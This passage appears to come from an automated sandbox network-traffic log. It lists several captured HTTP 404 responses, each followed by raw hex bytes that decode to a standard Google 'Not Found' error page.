          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 